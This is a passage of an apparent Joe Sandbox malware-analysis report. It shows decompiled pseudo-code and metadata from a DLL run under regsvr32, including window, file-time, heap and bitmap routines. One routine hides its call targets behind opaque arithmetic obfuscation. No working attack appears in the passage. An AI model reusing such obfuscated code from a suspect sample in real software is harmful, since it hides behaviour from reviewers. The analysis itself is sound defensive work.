						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1001B075(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E10019C16(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1001D320(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1001D35E(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x1005cef0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x1005cf48,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1005f9e4, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1005f9d4, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1005fc44, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10032D33(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1001D320(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001D35E(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1001D320(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001D35E(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x1006c938;
					E1003D2F0( &_v76, 0x1006522c);
					asm("int3");
					_push(4);
					E1003D1E6(E10052A8D, 0, _t147, _t154);
					_t127 = E1002D12C(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E10022AE3(_t127);
					}
					return E1003D2BE(_t70);
				}
			}












































                                                                                                                0x10033809
                                                                                                                0x10033809
                                                                                                                0x1003380a
                                                                                                                0x10033811
                                                                                                                0x10033813
                                                                                                                0x1003381a
                                                                                                                0x1003381b
                                                                                                                0x10033822
                                                                                                                0x10033825
                                                                                                                0x10033827
                                                                                                                0x00000000
                                                                                                                0x10033829
                                                                                                                0x10033829
                                                                                                                0x1003382b
                                                                                                                0x10033830
                                                                                                                0x10033832
                                                                                                                0x10033835
                                                                                                                0x00000000
                                                                                                                0x10033837
                                                                                                                0x1003383a
                                                                                                                0x10033842
                                                                                                                0x10033844
                                                                                                                0x10033844
                                                                                                                0x10033845
                                                                                                                0x10033848
                                                                                                                0x10033863
                                                                                                                0x1003386f
                                                                                                                0x1003387a
                                                                                                                0x10033889
                                                                                                                0x1003388a
                                                                                                                0x1003388f
                                                                                                                0x10033899
                                                                                                                0x10033899
                                                                                                                0x100338a1
                                                                                                                0x100338a6
                                                                                                                0x100338b0
                                                                                                                0x100338b2
                                                                                                                0x100338b4
                                                                                                                0x10033915
                                                                                                                0x10033924
                                                                                                                0x10033926
                                                                                                                0x10033928
                                                                                                                0x1003392e
                                                                                                                0x10033938
                                                                                                                0x1003393b
                                                                                                                0x10033941
                                                                                                                0x10033944
                                                                                                                0x10033947
                                                                                                                0x10033949
                                                                                                                0x10033954
                                                                                                                0x10033960
                                                                                                                0x10033963
                                                                                                                0x10033969
                                                                                                                0x1003396c
                                                                                                                0x1003396f
                                                                                                                0x10033971
                                                                                                                0x10033973
                                                                                                                0x10033981
                                                                                                                0x00000000
                                                                                                                0x10033981
                                                                                                                0x1003394b
                                                                                                                0x1003394b
                                                                                                                0x1003394b
                                                                                                                0x10033949
                                                                                                                0x100338b6
                                                                                                                0x100338b6
                                                                                                                0x100338ba
                                                                                                                0x100338c5
                                                                                                                0x100338c8
                                                                                                                0x100338ca
                                                                                                                0x100338cd
                                                                                                                0x100338cf
                                                                                                                0x100338cf
                                                                                                                0x100338d6
                                                                                                                0x100338d9
                                                                                                                0x10033983
                                                                                                                0x10033985
                                                                                                                0x1003398a
                                                                                                                0x1003398d
                                                                                                                0x1003398f
                                                                                                                0x1003399f
                                                                                                                0x100339a9
                                                                                                                0x100339b2
                                                                                                                0x100339b2
                                                                                                                0x100339b7
                                                                                                                0x100338df
                                                                                                                0x100338df
                                                                                                                0x100338e2
                                                                                                                0x100338f2
                                                                                                                0x100338fc
                                                                                                                0x10033905
                                                                                                                0x10033905
                                                                                                                0x1003390a
                                                                                                                0x1003390a
                                                                                                                0x100338d9
                                                                                                                0x100339bd
                                                                                                                0x100339bd
                                                                                                                0x10033835
                                                                                                                0x1003381d
                                                                                                                0x1003381d
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$DesktopVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 1055025324-0
                                                                                                                • Opcode ID: 110d3bac6837f59858366cce0ca108784b8b0ec5d92e0cf275b344010d483ca8
                                                                                                                • Instruction ID: 33e33c5df8d75f6d5011043d3de45f5d230c7e66059f1d27cc87883ac04d00d4
                                                                                                                • Opcode Fuzzy Hash: 110d3bac6837f59858366cce0ca108784b8b0ec5d92e0cf275b344010d483ca8
                                                                                                                • Instruction Fuzzy Hash: 5B51E675A0010AEFCB01DFA8D9C4DAEB7B9FF48205B214459F655EB251CB31EE44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100088F0 Relevance: 6.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 28%
                                                                                                                			E100088F0(void* _a4) {
				void* _t44;
				signed int _t45;
				signed int _t51;
				signed int _t60;
				signed int _t62;
				signed int _t74;
				signed int _t83;
				void* _t93;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				intOrPtr _t112;
				signed int _t117;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				void* _t137;
				signed int _t144;
				void* _t159;
				void* _t160;

				_t137 = _a4;
				if(_t137 != 0) {
					if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
						_t134 =  *0x1006c2cc; // 0x0
						_t83 =  *0x1006c2bc; // 0x0
						_t126 =  *0x1006c2d0; // 0x0
						_t7 = _t137 + 4; // 0xc0335d5e
						_t112 =  *_t7;
						_t9 = _t126 * 2; // 0x6
						_t135 =  *0x1006c2c0; // 0x0
						 *((intOrPtr*)(((_t83 + _t134 + (_t83 + _t134) * 2 - 3) *  *0x1006c2c8 + _t126 + _t9 + 6) * _t134 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 -  *0x1006c2c8 + (_t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 + _t83 - _t135 + _t135 -  *0x1006c2c4 + _t126 -  *0x1006c2c8) * 2 +  *((intOrPtr*)( *_t137 + 0x28)) + _t112))(_t112, 0, 0);
					}
					_t101 =  *0x1006c2d0; // 0x0
					_t45 =  *0x1006c2c8; // 0x0
					_t16 = _t137 + 0x30; // 0x8b14244c
					 *0x1006eff8((_t45 - _t101 *  *0x1006c2cc *  *0x1006c2c0 + (_t45 - _t101 *  *0x1006c2cc *  *0x1006c2c0) * 2 << 4) +  *_t16);
					_t160 = _t159 + 4;
					if( *((intOrPtr*)(_t137 + 8)) == 0) {
						L10:
						_t37 = _t137 + 4; // 0xc0335d5e
						_t104 =  *_t37;
						if(_t104 != 0) {
							_t38 = _t137 + 0x34; // 0x400d89c7
							_t51 =  *0x1006c2c4; // 0x0
							_t43 = _t137 + 0x20; // 0xc8a12874
							 *((intOrPtr*)( *_t43))(_t104, 0, _t51 + _t51 * 2 + _t51 + _t51 * 2 + 0x8000,  *_t38);
						}
						return HeapFree(GetProcessHeap(), 0, _t137);
					} else {
						_t130 =  *0x1006c2c4; // 0x0
						_t106 =  *0x1006c2c0; // 0x0
						_t117 =  *0x1006c2cc; // 0x0
						_t60 =  *0x1006c2d0; // 0x0
						_t20 = _t137 + 0xc; // 0x8b078bc3
						_t93 = 0;
						if(_t117 - (_t130 * _t130 *  *0x1006c2c8 * _t106 + _t106 + 2) * _t106 - _t60 +  *_t20 <= 0) {
							L9:
							_t133 = (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8;
							_t34 = _t137 + 8; // 0x44c4835b
							 *0x1006eff8( *_t34 - (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2 + (_t130 + 3) * _t60 + (_t117 + 1) *  *0x1006c2bc * _t106 +  *0x1006c2c8 + _t133 * 2);
							_t160 = _t160 + 4;
							goto L10;
						}
						do {
							_t62 =  *0x1006c2c8; // 0x0
							_t144 =  *0x1006c2bc; // 0x0
							_t21 = _t137 + 8; // 0x44c4835b
							if( *((intOrPtr*)( *_t21 + (_t144 - _t62 * _t106 - _t117 + _t93) * 4)) != 0) {
								_t24 = _t137 + 0x34; // 0x400d89c7
								_t74 =  *0x1006c2c8; // 0x0
								_t27 = _t137 + 8; // 0x44c4835b
								_t30 = _t137 + 0x2c; // 0x3ca2b80
								 *((intOrPtr*)( *_t30))( *((intOrPtr*)( *_t27 + (_t93 + (((_t74 + 2) * _t117 + 3) * _t106 + (_t117 * _t117 - _t130 *  *0x1006c2bc - _t130) *  *0x1006c2d0 + _t130) * 4 + ((_t74 + 2) * _t117 + 3) * _t106 + (_t117 * _t117 - _t130 *  *0x1006c2bc - _t130) *  *0x1006c2d0 + _t130) * 4)),  *_t24);
								_t106 =  *0x1006c2c0; // 0x0
								_t117 =  *0x1006c2cc; // 0x0
								_t130 =  *0x1006c2c4; // 0x0
								_t160 = _t160 + 8;
							}
							_t60 =  *0x1006c2d0; // 0x0
							_t33 = _t137 + 0xc; // 0x8b078bc3
							_t93 = _t93 + 1;
						} while (_t93 < _t117 - (_t130 * _t130 *  *0x1006c2c8 * _t106 + _t106 + 2) * _t106 - _t60 +  *_t33);
						goto L9;
					}
				}
				return _t44;
			}
























                                                                                                                0x100088f1
                                                                                                                0x100088f7
                                                                                                                0x10008904
                                                                                                                0x10008906
                                                                                                                0x1000890c
                                                                                                                0x1000891f
                                                                                                                0x10008925
                                                                                                                0x10008925
                                                                                                                0x10008928
                                                                                                                0x10008931
                                                                                                                0x1000895c
                                                                                                                0x1000895c
                                                                                                                0x1000895e
                                                                                                                0x10008972
                                                                                                                0x1000897f
                                                                                                                0x10008983
                                                                                                                0x10008989
                                                                                                                0x10008990
                                                                                                                0x10008ab5
                                                                                                                0x10008ab5
                                                                                                                0x10008ab5
                                                                                                                0x10008abd
                                                                                                                0x10008abf
                                                                                                                0x10008ac3
                                                                                                                0x10008ad6
                                                                                                                0x10008ad9
                                                                                                                0x10008adb
                                                                                                                0x00000000
                                                                                                                0x10008996
                                                                                                                0x10008996
                                                                                                                0x1000899c
                                                                                                                0x100089ae
                                                                                                                0x100089c2
                                                                                                                0x100089c9
                                                                                                                0x100089cc
                                                                                                                0x100089d0
                                                                                                                0x10008a84
                                                                                                                0x10008a9d
                                                                                                                0x10008a9f
                                                                                                                0x10008aac
                                                                                                                0x10008ab2
                                                                                                                0x00000000
                                                                                                                0x10008ab2
                                                                                                                0x100089e0
                                                                                                                0x100089e0
                                                                                                                0x100089e5
                                                                                                                0x100089f0
                                                                                                                0x100089fb
                                                                                                                0x100089fd
                                                                                                                0x10008a11
                                                                                                                0x10008a34
                                                                                                                0x10008a3a
                                                                                                                0x10008a3e
                                                                                                                0x10008a40
                                                                                                                0x10008a46
                                                                                                                0x10008a4c
                                                                                                                0x10008a52
                                                                                                                0x10008a52
                                                                                                                0x10008a6f
                                                                                                                0x10008a76
                                                                                                                0x10008a79
                                                                                                                0x10008a7c
                                                                                                                0x00000000
                                                                                                                0x100089e0
                                                                                                                0x10008990
                                                                                                                0x10008aef

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: b08c8ccb2079808c9cd3088015a788ca90edb0835c532b8cd28d86616119427e
                                                                                                                • Instruction ID: e5945d3396b55d96ce05bd6873ecdba237432edcb74fc20a22c2999447666e4a
                                                                                                                • Opcode Fuzzy Hash: b08c8ccb2079808c9cd3088015a788ca90edb0835c532b8cd28d86616119427e
                                                                                                                • Instruction Fuzzy Hash: BE51643260021B8FE358EFA8CDD5E6977A6FB84304F05812AD945CB6B5E6B0F551CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10034D23 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10034D23(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t102 = _a4;
				_t100 = __ecx;
				E1003BB70(__ecx, _t102, 0, 0x128);
				E10017042(0, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x1005af9c; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1002A695( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1002A7AF( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1002A695( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1002A7AF( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1002A695( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1002A7AF( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}






















                                                                                                                0x10034d2b
                                                                                                                0x10034d38
                                                                                                                0x10034d3a
                                                                                                                0x10034d4d
                                                                                                                0x10034d52
                                                                                                                0x10034d58
                                                                                                                0x10034d5e
                                                                                                                0x10034e72
                                                                                                                0x00000000
                                                                                                                0x10034e74
                                                                                                                0x10034d6c
                                                                                                                0x10034d79
                                                                                                                0x10034d86
                                                                                                                0x10034d8f
                                                                                                                0x10034d92
                                                                                                                0x10034d95
                                                                                                                0x10034d9b
                                                                                                                0x10034da1
                                                                                                                0x10034db9
                                                                                                                0x10034da3
                                                                                                                0x10034da3
                                                                                                                0x10034da3
                                                                                                                0x10034dc7
                                                                                                                0x10034de3
                                                                                                                0x10034de5
                                                                                                                0x10034dc9
                                                                                                                0x10034dd2
                                                                                                                0x10034dd9
                                                                                                                0x10034dde
                                                                                                                0x10034dde
                                                                                                                0x10034df3
                                                                                                                0x10034e14
                                                                                                                0x10034e17
                                                                                                                0x10034df5
                                                                                                                0x10034dfe
                                                                                                                0x10034e05
                                                                                                                0x10034e0b
                                                                                                                0x10034e0b
                                                                                                                0x10034e25
                                                                                                                0x10034e46
                                                                                                                0x10034e49
                                                                                                                0x10034e27
                                                                                                                0x10034e30
                                                                                                                0x10034e37
                                                                                                                0x10034e3d
                                                                                                                0x10034e3d
                                                                                                                0x10034e51
                                                                                                                0x10034e56
                                                                                                                0x10034e5b
                                                                                                                0x10034e5b
                                                                                                                0x10034e64
                                                                                                                0x10034e69
                                                                                                                0x10034e6f
                                                                                                                0x10034e6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10034d95
                                                                                                                0x10034d7b
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10034D3A
                                                                                                                  • Part of subcall function 10017042: _wctomb_s.LIBCMT ref: 10017052
                                                                                                                • GetFileTime.KERNEL32(?,?,?,?), ref: 10034D71
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 10034D86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 26245289-0
                                                                                                                • Opcode ID: 1c3635f1f843798793357e0fd1e265308dbc9aa43cabc2304d30c89dc91eda71
                                                                                                                • Instruction ID: 29182117bb34cabb22a9083561f3b77f2cd62cc52f0fc2d74ac8d73a98a901d8
                                                                                                                • Opcode Fuzzy Hash: 1c3635f1f843798793357e0fd1e265308dbc9aa43cabc2304d30c89dc91eda71
                                                                                                                • Instruction Fuzzy Hash: 63413E79500705AFC725DF68C88189BBBF8FF09351B118A2EE5A6DB690EB30F944CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004C70 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10004C70(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				struct HDC__* _t55;
				intOrPtr _t64;
				intOrPtr* _t73;
				void* _t76;
				signed int _t102;
				void* _t106;
				int _t107;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				void* _t118;
				signed int _t119;

				_push(0xffffffff);
				_push(E10051098);
				_push( *[fs:0x0]);
				_t119 = _t118 - 0x30;
				_push(_t111);
				_push(_t106);
				_t45 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t45 ^ _t119);
				 *[fs:0x0] = _t119 + 0x44;
				_t76 = __ecx;
				 *((intOrPtr*)(_t119 + 0x4c)) = 0;
				 *(_t119 + 0x18) = 0;
				 *((intOrPtr*)(_t119 + 0x14)) = 0x100572e4;
				 *((char*)(_t119 + 0x4c)) = 1;
				E100247F5(_t119 + 0x18, _t106, 0, LoadBitmapA( *(E10023187(__ecx, _t106, _t111, __eflags) + 0xc), 0xa9));
				GetObjectA( *(_t119 + 0x18), 0x18, _t119 + 0x2c);
				E10023F76(_t119 + 0x1c);
				_t112 =  *((intOrPtr*)(_t119 + 0x54));
				 *((char*)(_t119 + 0x4c)) = 2;
				if(_t112 != 0) {
					_t55 =  *(_t112 + 4);
				} else {
					_t55 = 0;
				}
				E1002452E(_t119 + 0x20, _t106, 0, CreateCompatibleDC(_t55));
				E1002487A( *(_t119 + 0x20),  *(_t119 + 0x18));
				_t107 =  *(_t119 + 0x64);
				StretchBlt( *(_t112 + 4), 0, 0, 0x18, _t107,  *(_t119 + 0x20), 0, 0,  *(_t119 + 0x30),  *(_t119 + 0x34), 0xcc0020);
				E10024848(_t119 + 0x14);
				_t64 =  *( *( *_t112 + 0x28))(_t76 + 0x104);
				_t116 =  *((intOrPtr*)(_t119 + 0x68));
				 *((intOrPtr*)(_t119 + 0x58)) = _t64;
				 *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x5c))))( *((intOrPtr*)(_t119 + 0x5c)) + 5, _t107 -  *((intOrPtr*)(_t119 + 0x5c)) + 0x41, _t116,  *((intOrPtr*)(_t116 - 0xc)));
				_t102 =  *( *_t112 + 0x28);
				 *_t102( *((intOrPtr*)(_t119 + 0x54)));
				 *((intOrPtr*)(_t76 + 0x100)) = 0;
				 *((char*)(_t119 + 0x4c)) = 1;
				E100245A8(_t119 + 0x1c);
				 *((char*)(_t119 + 0x4c)) = 0;
				 *((intOrPtr*)(_t119 + 0x14)) = 0x100572c4;
				E10024848(_t119 + 0x14);
				_t73 = _t116 - 0x10;
				 *((intOrPtr*)(_t119 + 0x4c)) = 0xffffffff;
				asm("lock xadd [ecx], edx");
				if((_t102 | 0xffffffff) - 1 <= 0) {
					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t73)) + 4))))(_t73);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t119 + 0x44));
				return _t73;
			}




















                                                                                                                0x10004c70
                                                                                                                0x10004c72
                                                                                                                0x10004c7d
                                                                                                                0x10004c7e
                                                                                                                0x10004c83
                                                                                                                0x10004c84
                                                                                                                0x10004c85
                                                                                                                0x10004c8c
                                                                                                                0x10004c91
                                                                                                                0x10004c97
                                                                                                                0x10004c9b
                                                                                                                0x10004c9f
                                                                                                                0x10004ca3
                                                                                                                0x10004cab
                                                                                                                0x10004cc9
                                                                                                                0x10004cda
                                                                                                                0x10004ce4
                                                                                                                0x10004ce9
                                                                                                                0x10004cef
                                                                                                                0x10004cf4
                                                                                                                0x10004cfa
                                                                                                                0x10004cf6
                                                                                                                0x10004cf6
                                                                                                                0x10004cf6
                                                                                                                0x10004d09
                                                                                                                0x10004d18
                                                                                                                0x10004d29
                                                                                                                0x10004d40
                                                                                                                0x10004d4a
                                                                                                                0x10004d5d
                                                                                                                0x10004d5f
                                                                                                                0x10004d6d
                                                                                                                0x10004d83
                                                                                                                0x10004d8b
                                                                                                                0x10004d91
                                                                                                                0x10004d97
                                                                                                                0x10004da1
                                                                                                                0x10004da6
                                                                                                                0x10004daf
                                                                                                                0x10004db4
                                                                                                                0x10004dbc
                                                                                                                0x10004dc1
                                                                                                                0x10004dc4
                                                                                                                0x10004dd2
                                                                                                                0x10004dd9
                                                                                                                0x10004de3
                                                                                                                0x10004de3
                                                                                                                0x10004de9
                                                                                                                0x10004df8

                                                                                                                APIs
                                                                                                                • LoadBitmapA.USER32 ref: 10004CBE
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10004CDA
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10004CFE
                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,00000018,?,?,00000000,00000000,?,?,00CC0020), ref: 10004D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BitmapCompatibleCreateLoadObjectStretch
                                                                                                                • String ID:
                                                                                                                • API String ID: 1313918214-0
                                                                                                                • Opcode ID: 90a382312d36e1a782ccbb2849c981e49af76e3876e9b04abb96af5c556acf95
                                                                                                                • Instruction ID: 981638c05eaeedc65a42f4fecd3c7dad98e086370d3711bde41bb7d3d10c01a7
                                                                                                                • Opcode Fuzzy Hash: 90a382312d36e1a782ccbb2849c981e49af76e3876e9b04abb96af5c556acf95
                                                                                                                • Instruction Fuzzy Hash: 764169B5208345AFD310CF58C884E5BBBF9FB99710F018A1DF59587291DB35E909CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039B0A Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10039B0A(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t60;
				signed short _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t85 = E100247E7(__ecx, __ecx, _t80, _t84, __eflags);
				_v16 = _t85;
				_v8 = E10024C61(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
